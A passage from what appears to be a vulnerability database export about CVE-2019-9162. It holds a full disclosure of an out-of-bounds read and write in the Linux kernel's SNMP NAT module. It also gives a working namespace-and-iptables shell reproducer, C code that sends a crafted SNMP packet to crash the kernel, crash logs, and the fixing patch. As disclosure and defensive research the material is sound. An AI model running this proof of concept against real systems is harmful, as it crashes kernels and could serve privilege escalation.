1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 19 a7 0c 00 f7 d8 64 89 01 48\r\n[17261.115855] RSP: 002b:00007ffc43daf3f8 EFLAGS: 00003246 ORIG_RAX: 0000000000000010\r\n[17261.115856] RAX: ffffffffffffffda RBX: 0000562c71bece00 RCX: 00007fb3e93d3747\r\n[17261.115857] RDX: 00007ffc43daf430 RSI: 00000000c0086440 RDI: 000000000000000e\r\n[17261.115857] RBP: 00007ffc43daf430 R08: 0000562c71bece00 R09: 00000000000003d1\r\n[17261.115858] R10: 0000562c71085010 R11: 0000000000003246 R12: 00000000c0086440\r\n[17261.115858] R13: 000000000000000e R14: 0000562c710bcba0 R15: 0000562c710d82f0\r\n[17261.115860] Disabling lock debugging due to kernel taint\r\n======================================================================\r\n\r\n\r\nI suggest the following patch (copy attached with proper whitespace); I have\r\ntested that it prevents my PoC from crashing the kernel, but I haven't tested\r\nwhether SNMP NATting still works.\r\n\r\n======================================================================\r\nFrom b94c17fa81f8870885baaec7815eee8b789d2c7b Mon Sep 17 00:00:00 2001\r\nFrom: Jann Horn <jannh@google.com>\r\nDate: Wed, 6 Feb 2019 22:56:15 +0100\r\nSubject: [PATCH] netfilter: nf_nat_snmp_basic: add missing length checks in\r\n ASN.1 cbs\r\n\r\nThe generic ASN.1 decoder infrastructure doesn't guarantee that callbacks\r\nwill get as much data as they expect; callbacks have to check the `datalen`\r\nparameter before looking at `data`. Make sure that snmp_version() and\r\nsnmp_helper() don't read/write beyond the end of the packet data.\r\n\r\n(Also move the assignment to `pdata` down below the check to make it clear\r\nthat it isn't necessarily a pointer we can use before the `datalen` check.)\r\n\r\nFixes: cc2d58634e0f (\"netfilter: nf_nat_snmp_basic: use asn1 decoder library\")\r\nSigned-off-by: Jann Horn <jannh@google.com>\r\n---\r\n net/ipv4/netfilter/nf_nat_snmp_basic_main.c | 7 ++++++-\r\n 1 file changed, 6 insertions(+), 1 deletion(-)\r\n\r\ndiff --git a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\nindex a0aa13bcabda..0a8a60c1bf9a 100644\r\n--- a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\n+++ b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\n@@ -105,6 +105,8 @@ static void fast_csum(struct snmp_ctx *ctx, unsigned char offset)\r\n int snmp_version(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n {\r\n+ if (datalen != 1)\r\n+ return -EINVAL;\r\n if (*(unsigned char *)data > 1)\r\n return -ENOTSUPP;\r\n return 1;\r\n@@ -114,8 +116,11 @@ int snmp_helper(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n {\r\n struct snmp_ctx *ctx = (struct snmp_ctx *)context;\r\n- __be32 *pdata = (__be32 *)data;\r\n+ __be32 *pdata;\r\n \r\n+ if (datalen != 4)\r\n+ return -EINVAL;\r\n+ pdata = (__be32 *)data;\r\n if (*pdata == ctx->from) {\r\n pr_debug(\"%s: %pI4 to %pI4\\n\", __func__,\r\n (void *)&ctx->from, (void *)&ctx->to);\r\n-- \r\n2.20.1.611.gfbb209baf1-goog\r\n======================================================================", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46477"}], "zdt": [{"lastseen": "2019-03-05T02:20:55", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2019-03-02T00:00:00", "title": "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9162"], "modified": "2019-03-02T00:00:00", "id": "1337DAY-ID-32291", "href": "https://0day.today/exploit/description/32291", "sourceData": "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module\r\n\r\ncommit cc2d58634e0f (\"netfilter: nf_nat_snmp_basic: use asn1 decoder library\",\r\nfirst in 4.16) changed the nf_nat_snmp_basic module (which, when enabled, parses\r\nand modifies the ASN.1-encoded payloads of SNMP messages) so that the kernel's\r\nASN.1 infrastructure is used instead of an open-coded parser. The common ASN.1\r\ndecoder can invoke callbacks when certain objects are encountered. The SNMP\r\nhelper has two such callbacks defined in nf_nat_snmp_basic.asn1:\r\n\r\n - For the `version` field of a `Message` (a `INTEGER`), snmp_version() is\r\n invoked.\r\n - For each `IpAddress` (according to RFC 1155, a 4-byte octet string),\r\n snmp_helper() is invoked.\r\n\r\nThese callbacks contain the following code:\r\n\r\n\r\nint snmp_version(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n{\r\n if (*(unsigned char *)data > 1)\r\n return -ENOTSUPP;\r\n return 1;\r\n}\r\n\r\nint snmp_helper(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n{\r\n struct snmp_ctx *ctx = (struct snmp_ctx *)context;\r\n __be32 *pdata = (__be32 *)data;\r\n\r\n if (*pdata == ctx->from) {\r\n pr_debug(\"%s: %pI4 to %pI4\\n\", __func__,\r\n (void *)&ctx->from, (void *)&ctx->to);\r\n\r\n if (*ctx->check)\r\n fast_csum(ctx, (unsigned char *)data - ctx->begin);\r\n *pdata = ctx->to;\r\n }\r\n\r\n return 1;\r\n}\r\n\r\n\r\nThe problem is that both of these callbacks can be invoked by the ASN.1 parser\r\nwith `data` pointing at the end of the packet and `datalen==0` (even though, for\r\nthe `INTEGER` type, X.690 says in section 8.3.1 that \"The contents octets shall\r\nconsist of one or more octets\"), but they don't check whether there is\r\nsufficient input available. This means that snmp_version() can read up to one\r\nbyte out-of-bounds and leak whether that byte was <=1, and snmp_helper() can\r\nread and potentially also write up to four bytes out-of-bounds.\r\n\r\nUnfortunately, KASAN can't detect the out-of-bounds reads because, as was\r\npointed out in\r\n<https://lore.kernel.org/lkml/[email\u00a0protected]/>\r\nregarding a (harmless) out-of-bounds read in the TCP input path, the kernel\r\nstores a `struct skb_shared_info` at the end of the socket buffer allocation,\r\ndirectly behind the packet data. The kernel can only detect that a problem\r\noccurred based on the later effects of an out-of-bounds write.\r\nIt might be a good idea to explicitly add some KASAN poison between the head\r\ndata and struct skb_shared_info to make it easier for kernel fuzzers to discover\r\nissues like this in the future.\r\n\r\n\r\nThere are two scenarios in which this bug might be attacked:\r\n\r\n - A router that performs NAT translation is explicitly set up to invoke the\r\n SNMP helper, and a device in the NATted network wants to attack the router.\r\n This is probably very rare, since the router would need to be explicitly\r\n configured to perform SNMP translation. On top of that, to corrupt memory,\r\n an attacker would need to be able to completely fill an SKB; it isn't clear\r\n to me whether that is possible remotely.\r\n - A local attacker could exploit the bug by setting up new network namespaces\r\n with an iptables configuration that invokes SNMP translation. This probably\r\n works as a local privilege escalation against some distribution kernels.\r\n The normal autoloading path for this code was only set up in\r\n commit 95c97998aa9f (\"netfilter: nf_nat_snmp_basic: add missing helper alias\r\n name\", first in 4.20), but from a glance, it looks like it would be possible\r\n on kernels before 4.20 to instead first load one of the openvswitch module's\r\n aliases \"net-pf-16-proto-16-family-ovs_*\" through ctrl_getfamily(), then use\r\n ovs_ct_add_helper() to trigger loading of \"nf_nat_snmp_basic\" through the\r\n alias \"ip_nat_snmp_basic\".\r\n\r\n\r\nThe following is a reproducer for a git master build that causes a kernel oops\r\n(nf_nat_snmp_basic must be compiled into the kernel, or built as a module, I\r\nthink):\r\n\r\n======================================================================\r\n#!/bin/sh\r\nunshare -mUrnp --mount-proc --fork bash <<SCRIPT_EOF\r\nset -e\r\nset -x\r\n\r\n# make \"ip netns\" work in here\r\nmount -t tmpfs none /var/run/\r\ncd /var/run\r\n\r\n# this namespace is the router with NAT\r\nip link set dev lo up\r\necho 1 > /proc/sys/net/ipv4/ip_forward\r\n/sbin/iptables -t nat -A POSTROUTING -o veth0 -j MASQUERADE\r\n/sbin/iptables -t raw -A PREROUTING -p udp --dport 162 -j CT --helper snmp_trap\r\n/sbin/iptables -A FORWARD -m conntrack --ctstate INVALID,NEW,RELATED,ESTABLISHED,SNAT,DNAT -m helper --helper snmp_trap -j ACCEPT\r\n\r\n# this namespace is the destination host for the SNMP trap message\r\nip netns add netns1\r\nnsenter --net=/var/run/netns/netns1 ip link set dev lo up\r\nip link add veth0 type veth peer name veth1\r\nip link set veth1 netns netns1\r\nnsenter --net=/var/run/netns/netns1 /sbin/ifconfig veth1 192.168.0.2/24 up\r\n/sbin/ifconfig veth0 192.168.0.1/24 up\r\n\r\n# this namespace sends the SNMP trap message\r\nip netns add netns2\r\nnsenter --net=/var/run/netns/netns2 ip link set dev lo up\r\nip link add veth2 type veth peer name veth3\r\nip link set veth3 netns netns2\r\n# /31 network, see RFC 3021\r\n# we want *.0.0.0 so that the 3 OOB bytes can be zero\r\nnsenter --net=/var/run/netns/netns2 /sbin/ifconfig veth3 10.0.0.0/31 up\r\n/sbin/ifconfig veth2 10.0.0.1/24 up\r\nnsenter --net=/var/run/netns/netns2 ip route add default via 10.0.0.1\r\n\r\n# debug\r\nip route\r\nnsenter --net=/var/run/netns/netns2 ip route\r\n\r\n# run the PoC\r\ncat > udp_repro.c <<C_EOF\r\n#define _GNU_SOURCE\r\n#include <arpa/inet.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <stdarg.h>\r\n#include <net/if.h>\r\n#include <linux/if.h>\r\n#include <linux/ip.h>\r\n#include <linux/udp.h>\r\n#include <linux/in.h>\r\n#include <err.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n\r\n#define IPADDR(a,b,c,d) (((a)<<0)+((b)<<8)+((c)<<16)+((d)<<24))\r\n\r\n// \"pc X\" comments in the following array refer to indices into\r\n// nf_nat_snmp_basic_machine in \"nf_nat_snmp_basic.asn1.c\", which\r\n// is generated as part of the kernel's build process.\r\n// reading the ASN.1 decoder and the generated machine opcodes\r\n// seemed easier than trying to build ASN.1 by looking at the\r\n// spec or something like that...\r\nuint8_t snmp_packet[] = {\r\n // pc 0: read tag, should match _tag(UNIV, CONS, SEQ) == 0x30\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // pc 2: read tag, should match _tag(UNIV, PRIM, INT) == 0x02\r\n // version number\r\n 0x02, 0x01,\r\n 0x00,\r\n\r\n // pc 5: read tag, should match _tag(UNIV, PRIM, OTS) == 0x04\r\n 0x04, 0x00,\r\n\r\n // pc 7: read tag, should match _tagn(CONT, CONS, 0) == 0xa0\r\n // selects GetRequest-PDU, length indef\r\n 0xa0, 0x80,\r\n\r\n // pc 34: read INT request-id\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 36: read INT error-status\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 38: read INT error-index\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 40: read seq VarBindList\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // pc 42: read seq VarBind\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // ptr 44: read tag, should match _tag(UNIV, PRIM, OID) == 0x06\r\n // ObjectName\r\n // (can use 0x82 as length to have two bytes of length following)\r\n // length chosen so that the end of packet data is directly\r\n // followed by the skb_shared_info, with the whole thing in a\r\n // kmalloc-512 slab.\r\n 0x06, 0x70,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n\r\n // ptr 46: read tag, should skip\r\n // ptr 48: read tag, should skip\r\n // ptr 50: read tag, should skip\r\n // ptr 52: read tag, should match _tagn(APPL, PRIM, 0) == 0x40\r\n // IpAddress\r\n // we could also use a length of zero, and the callback would still\r\n // be invoked, but we want control over the first byte so that we\r\n // can create a source IP match.\r\n 0x40, 0x01,\r\n // source IP 10.0.0.0\r\n 0x0a\r\n};\r\n\r\nvoid do_sendto(int sockfd, const void *buf, size_t len, int flags, const struct sockaddr *dest_addr, socklen_t addrlen) {\r\n int res = sendto(sockfd, buf, len, flags, dest_addr, addrlen);\r\n if (res != len) {\r\n if (res == -1)\r\n err(1, \"send failed\");\r\n else\r\n errx(1, \"partial send?\");\r\n }\r\n}\r\n\r\nint main(void) {\r\n int sock = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sock == -1) err(1, \"socket\");\r\n\r\n struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(162), .sin_addr = { .s_addr = IPADDR(192,168,0,2) } };\r\n\r\n // __ip_append_data() overallocates by 15 bytes for some reason; cancel it out\r\n // by using CORK to first send 15 bytes short, then append the remaining 15 bytes\r\n do_sendto(sock, snmp_packet, sizeof(snmp_packet)-15, MSG_MORE, (struct sockaddr *)&sa, sizeof(sa));\r\n do_sendto(sock, ((char*)snmp_packet)+sizeof(snmp_packet)-15, 15, 0, (struct sockaddr *)&sa, sizeof(sa));\r\n}\r\nC_EOF\r\ngcc -o udp_repro udp_repro.c -Wall\r\nnsenter --net=/var/run/netns/netns2 ./udp_repro\r\nSCRIPT_EOF\r\n======================================================================\r\n\r\nCorresponding splat:\r\n\r\n======================================================================\r\n[ 260.101983] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.134983] LoadPin: vda1 (254:1): writable\r\n[ 260.135981] LoadPin: enforcement can be disabled.\r\n[ 260.137085] LoadPin: kernel-module pinned obj=\"/lib/modules/5.0.0-rc5/kernel/net/bpfilter/bpfilter.ko\" pid=1095 cmdline=\"/sbin/modprobe -q -- bpfilter\"\r\n[ 260.143100] bpfilter: Loaded bpfilter_umh pid 1096\r\n[ 260.171851] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.248339] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready\r\n[ 260.250475] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready\r\n[ 260.261136] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.347678] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready\r\n[ 260.621924] page:ffffea000703de00 count:0 mapcount:-128 mapping:0000000000000000 index:0x0\r\n[ 260.624264] flags: 0x17fffc000000000()\r\n[ 260.625373] raw: 017fffc000000000 ffffea0007a6d408 ffffea000783fe08 0000000000000000\r\n[ 260.627650] raw: 0000000000000000 0000000000000003 00000000ffffff7f 0000000000000000\r\n[ 260.629926] page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)\r\n[ 260.631958] ------------[ cut here ]------------\r\n[ 260.633312] kernel BUG at ./include/linux/mm.h:546!\r\n[ 260.634771] invalid opcode: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN\r\n[ 260.636693] CPU: 6 PID: 1121 Comm: udp_repro Not tainted 5.0.0-rc5 #263\r\n[ 260.638583] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[ 260.641031] RIP: 0010:do_exit+0x1391/0x1440\r\n[ 260.642266] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c\r\n[ 260.647667] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286\r\n[ 260.649556] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000\r\n[ 260.651639] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0\r\n[ 260.653712] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9\r\n[ 260.655786] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34\r\n[ 260.657857] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78\r\n[ 260.659939] FS: 0000000000000000(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000\r\n[ 260.662281] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 260.664171] CR2: 00007fe2da7af5e0 CR3: 000000002de2b002 CR4: 0000000000360ee0\r\n[ 260.666987] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\r\n[ 260.670022] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 260.672035] Call Trace:\r\n[ 260.672761] ? release_task+0x860/0x860\r\n[ 260.673864] ? __fd_install+0x88/0x140\r\n[ 260.674946] ? handle_mm_fault+0x82/0x130\r\n[ 260.676100] do_group_exit+0x79/0x120\r\n[ 260.677157] __x64_sys_exit_group+0x28/0x30\r\n[ 260.678362] do_syscall_64+0x73/0x160\r\n[ 260.679440] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 260.680878] RIP: 0033:0x7fe2da7af618\r\n[ 260.681922] Code: Bad RIP value.\r\n[ 260.682872] RSP: 002b:00007ffd5a5e12c8 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\r\n[ 260.685057] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe2da7af618\r\n[ 260.687125] RDX: 0000000000000000 RSI: 000000000000003c RDI: 0000000000000000\r\n[ 260.689197] RBP: 00007fe2daa8c8e0 R08: 00000000000000e7 R09: ffffffffffffff98\r\n[ 260.691264] R10: 00007ffd5a5e1248 R11: 0000000000000246 R12: 00007fe2daa8c8e0\r\n[ 260.693343] R13: 00007fe2daa91c20 R14: 0000000000000000 R15: 0000000000000000\r\n[ 260.695412] Modules linked in: bpfilter\r\n[ 260.696776] ---[ end trace d5f4a4a31d762416 ]---\r\n[ 260.698931] RIP: 0010:do_exit+0x1391/0x1440\r\n[ 260.700171] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c\r\n[ 260.705625] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286\r\n[ 260.707183] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000\r\n[ 260.708823] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0\r\n[ 260.710384] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9\r\n[ 260.711888] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34\r\n[ 260.713785] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78\r\n[ 260.715326] FS: 00007fe2dac99700(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000\r\n[ 260.717071] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 260.718340] CR2: 00007fe2da7af5ee CR3: 000000002de2b002 CR4: 0000000000360ee0\r\n[ 260.719867] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\r\n[ 260.721389] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 260.722923] Fixing recursive fault but reboot is needed!\r\n======================================================================\r\n\r\n\r\nIt also works against a Debian testing distro kernel if you first (as root)\r\nset kernel.unprivileged_userns_clone=1 and modprobe nf_nat_snmp_basic; splat:\r\n\r\n======================================================================\r\n[17260.886470] IPv6: ADDRCONF(NETDEV_UP): veth1: link is not ready\r\n[17260.887304] IPv6: ADDRCONF(NETDEV_UP): veth0: link is not ready\r\n[17260.887310] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready\r\n[17260.887334] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready\r\n[17260.930188] IPv6: ADDRCONF(NETDEV_UP): veth3: link is not ready\r\n[17260.931286] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready\r\n[17261.115583] BUG: Bad page state in process Xorg pfn:276500\r\n[17261.115588] page:ffffcf4ac9d94000 count:-1 mapcount:0 mapping:0000000000000000 index:0x0\r\n[17261.115595] flags: 0x17fffc000000000()\r\n[17261.115598] raw: 017fffc000000000 dead000000000100 dead000000000200 0000000000000000\r\n[17261.115599] raw: 0000000000000000 0000000000000000 ffffffffffffffff 0000000000000000\r\n[17261.115601] page dumped because: nonzero _count\r\n[17261.115602] Modules linked in: veth xt_helper xt_conntrack nf_nat_snmp_basic nf_conntrack_snmp nf_conntrack_broadcast xt_CT xt_tcpudp nft_counter nft_chain_nat_ipv4 ipt_MASQUERADE nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nft_compat nf_tables nfnetlink uinput atm netrom appletalk psnap llc ax25 snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer joydev qxl snd soundcore ttm drm_kms_helper drm sg evdev virtio_balloon serio_raw virtio_console crct10dif_pclmul crc32_pclmul pcspkr ghash_clmulni_intel button ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto ecb btrfs xor zstd_decompress zstd_compress xxhash hid_generic usbhid hid raid6_pq libcrc32c crc32c_generic sr_mod cdrom ata_generic virtio_net net_failover virtio_blk failover crc32c_intel\r\n[17261.115641] ata_piix libata ehci_pci aesni_intel uhci_hcd aes_x86_64 ehci_hcd crypto_simd cryptd virtio_pci usbcore scsi_mod psmouse glue_helper virtio_ring i2c_piix4 usb_common virtio floppy\r\n[17261.115652] CPU: 14 PID: 653 Comm: Xorg Not tainted 4.19.0-1-amd64 #1 Debian 4.19.12-1\r\n[17261.115653] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[17261.115654] Call Trace:\r\n[17261.115681] dump_stack+0x5c/0x80\r\n[17261.115688] bad_page.cold.115+0x7f/0xb2\r\n[17261.115690] get_page_from_freelist+0xf51/0x1200\r\n[17261.115694] ? reservation_object_reserve_shared+0x32/0x70\r\n[17261.115696] ? get_page_from_freelist+0x8c3/0x1200\r\n[17261.115698] __alloc_pages_nodemask+0x112/0x2b0\r\n[17261.115703] new_slab+0x288/0x6e0\r\n[17261.115707] ? update_blocked_averages+0x3ca/0x560\r\n[17261.115708] ___slab_alloc+0x378/0x500\r\n[17261.115710] ? update_nohz_stats+0x41/0x50\r\n[17261.115713] ? shmem_alloc_inode+0x16/0x30\r\n[17261.115715] ? shmem_alloc_inode+0x16/0x30\r\n[17261.115716] __slab_alloc+0x1c/0x30\r\n[17261.115717] kmem_cache_alloc+0x192/0x1c0\r\n[17261.115719] shmem_alloc_inode+0x16/0x30\r\n[17261.115722] alloc_inode+0x1b/0x80\r\n[17261.115725] new_inode_pseudo+0xc/0x60\r\n[17261.115726] new_inode+0x12/0x30\r\n[17261.115728] shmem_get_inode+0x49/0x220\r\n[17261.115731] __shmem_file_setup.part.42+0x3f/0x130\r\n[17261.115754] drm_gem_object_init+0x26/0x40 [drm]\r\n[17261.115758] qxl_bo_create+0x79/0x170 [qxl]\r\n[17261.115762] qxl_gem_object_create+0x60/0x120 [qxl]\r\n[17261.115764] ? qxl_map_ioctl+0x20/0x20 [qxl]\r\n[17261.115767] qxl_gem_object_create_with_handle+0x4e/0xb0 [qxl]\r\n[17261.115769] qxl_alloc_ioctl+0x42/0xa0 [qxl]\r\n[17261.115777] ? drm_dev_enter+0x19/0x50 [drm]\r\n[17261.115785] drm_ioctl_kernel+0xa1/0xf0 [drm]\r\n[17261.115807] drm_ioctl+0x1fc/0x390 [drm]\r\n[17261.115810] ? qxl_map_ioctl+0x20/0x20 [qxl]\r\n[17261.115812] ? ep_scan_ready_list.constprop.22+0x1fc/0x220\r\n[17261.115814] ? __hrtimer_init+0xb0/0xb0\r\n[17261.115816] ? timerqueue_add+0x52/0x80\r\n[17261.115834] ? enqueue_hrtimer+0x38/0x90\r\n[17261.115835] ? hrtimer_start_range_ns+0x1b7/0x2c0\r\n[17261.115836] do_vfs_ioctl+0xa4/0x630\r\n[17261.115840] ? __sys_recvmsg+0x83/0xa0\r\n[17261.115841] ksys_ioctl+0x60/0x90\r\n[17261.115843] __x64_sys_ioctl+0x16/0x20\r\n[17261.115846] do_syscall_64+0x53/0x100\r\n[17261.115851] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[17261.115852] RIP: 0033:0x7fb3e93d3747\r\n[17261.115854] Code: 00 00 90 48 8b 05 49 a7 0c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 19 a7 0c 00 f7 d8 64 89 01 48\r\n[17261.115855] RSP: 002b:00007ffc43daf3f8 EFLAGS: 00003246 ORIG_RAX: 0000000000000010\r\n[17261.115856] RAX: ffffffffffffffda RBX: 0000562c71bece00 RCX: 00007fb3e93d3747\r\n[17261.115857] RDX: 00007ffc43daf430 RSI: 00000000c0086440 RDI: 000000000000000e\r\n[17261.115857] RBP: 00007ffc43daf430 R08: 0000562c71bece00 R09: 00000000000003d1\r\n[17261.115858] R10: 0000562c71085010 R11: 0000000000003246 R12: 00000000c0086440\r\n[17261.115858] R13: 000000000000000e R14: 0000562c710bcba0 R15: 0000562c710d82f0\r\n[17261.115860] Disabling lock debugging due to kernel taint\r\n======================================================================\r\n\r\n\r\nI suggest the following patch (copy attached with proper whitespace); I have\r\ntested that it prevents my PoC from crashing the kernel, but I haven't tested\r\nwhether SNMP NATting still works.\r\n\r\n======================================================================\r\nFrom b94c17fa81f8870885baaec7815eee8b789d2c7b Mon Sep 17 00:00:00 2001\r\nFrom: Jann Horn <[email\u00a0protected]>\r\nDate: Wed, 6 Feb 2019 22:56:15 +0100\r\nSubject: [PATCH] netfilter: nf_nat_snmp_basic: add missing length checks in\r\n ASN.1 cbs\r\n\r\nThe generic ASN.1 decoder infrastructure doesn't guarantee that callbacks\r\nwill get as much data as they expect; callbacks have to check the `datalen`\r\nparameter before looking at `data`. Make sure that snmp_version() and\r\nsnmp_helper() don't read/write beyond the end of the packet data.\r\n\r\n(Also move the assignment to `pdata` down below the check to make it clear\r\nthat it isn't necessarily a pointer we can use before the `datalen` check.)\r\n\r\nFixes: cc2d58634e0f (\"netfilter: nf_nat_snmp_basic: use asn1 decoder library\")\r\nSigned-off-by: Jann Horn <[email\u00a0protected]>\r\n---\r\n net/ipv4/netfilter/nf_nat_snmp_basic_main.c | 7 ++++++-\r\n 1 file changed, 6 insertions(+), 1 deletion(-)\r\n\r\ndiff --git a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\nindex a0aa13bcabda..0a8a60c1bf9a 100644\r\n--- a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\n+++ b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\n@@ -105,6 +105,8 @@ static void fast_csum(struct snmp_ctx *ctx, unsigned char offset)\r\n int snmp_version(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n {\r\n+ if (datalen != 1)\r\n+ return -EINVAL;\r\n if (*(unsigned char *)data > 1)\r\n return -ENOTSUPP;\r\n return 1;\r\n@@ -114,8 +116,11 @@ int snmp_helper(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n {\r\n struct snmp_ctx *ctx = (struct snmp_ctx *)context;\r\n- __be32 *pdata = (__be32 *)data;\r\n+ __be32 *pdata;\r\n \r\n+ if (datalen != 4)\r\n+ return -EINVAL;\r\n+ pdata = (__be32 *)data;\r\n if (*pdata == ctx->from) {\r\n pr_debug(\"%s: %pI4 to %pI4\\n\", __func__,\r\n (void *)&ctx->from, (void *)&ctx->to);\r\n-- \r\n2.20.1.611.gfbb209baf1-goog\r\n======================================================================\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/32291"}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8980", "CVE-2019-9162"], "description": "Kernel-headers includes the C header files that specify the interface between the Linux kernel and userspace libraries and programs. The header files define structures and constants that are needed for building most standard programs and are also needed for rebuilding the glibc package. ", "modified": "2019-03-01T02:41:34", "published": "2019-03-01T02:41:34", "id": "FEDORA:9FFEF6014BBC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: kernel-headers-4.20.12-200.fc29", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8980", "CVE-2019-9162", "CVE-2019-9213"], "description": 